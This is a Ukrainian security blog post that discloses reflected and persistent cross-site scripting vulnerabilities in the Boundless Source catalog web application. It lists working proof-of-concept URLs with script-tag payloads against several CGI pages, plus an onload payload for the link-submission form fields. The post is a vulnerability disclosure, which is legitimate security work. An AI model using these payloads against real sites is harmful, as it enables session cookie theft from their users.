Cross-Site Scripting уразливості в Boundless Source

23:52 26.01.2008

У листопаді, 29.11.2007, я знайшов Cross-Site Scripting уразливості у веб додатку Boundless Source (скрипт каталогу).

XSS:

http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20

http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

POST запит на сторінці http://site/catalog/add-lnk.cgi?cmd=showform

<BODY onload=alert(document.cookie)В полях: Название ресурса, URL, Регион, Описание сайта.

Вразливі версії Boundless Source 1.2.1 (безкоштовна) і 2.4 (комерційна) та попередні версії. Про уразливості розробникам веб додатка я повідомлю найближчим часом.

This entry was posted on 23:52 26.01.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

You must be logged in to post a comment.

Websecurity - Веб безпека

Cross-Site Scripting уразливості в Boundless Source

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета